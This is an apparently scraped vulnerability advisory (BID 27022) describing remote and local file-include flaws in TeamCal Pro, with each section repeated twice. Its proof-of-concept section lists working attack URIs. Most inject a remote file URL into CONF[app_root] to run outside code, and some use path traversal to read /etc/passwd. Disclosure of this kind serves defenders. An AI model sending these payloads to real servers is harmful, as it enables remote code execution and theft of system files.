TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
BID:27022
Info
TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
| Bugtraq ID: | 27022 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6554 CVE-2007-6553 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 25 2007 12:00AM |
| Updated: | Jul 05 2016 10:00PM |
| Credit: | GoLd_M is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
George Lewe TeamCal Pro 3.1 George Lewe TeamCal Pro 2.8.1 |
| Not Vulnerable: | |
Discussion
TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
TeamCal Pro is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues will allow an attacker to access potentially sensitive information and execute arbitrary scripts or PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
TeamCal Pro is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues will allow an attacker to access potentially sensitive information and execute arbitrary scripts or PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Exploit / POC
TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/other.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/other.inc.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://www.example.com/020.txt?
http://www.example.com/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00
Solution / Fix
TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
TeamCal Pro Multiple Remote and Local File Include Vulnerabilities
References:
References: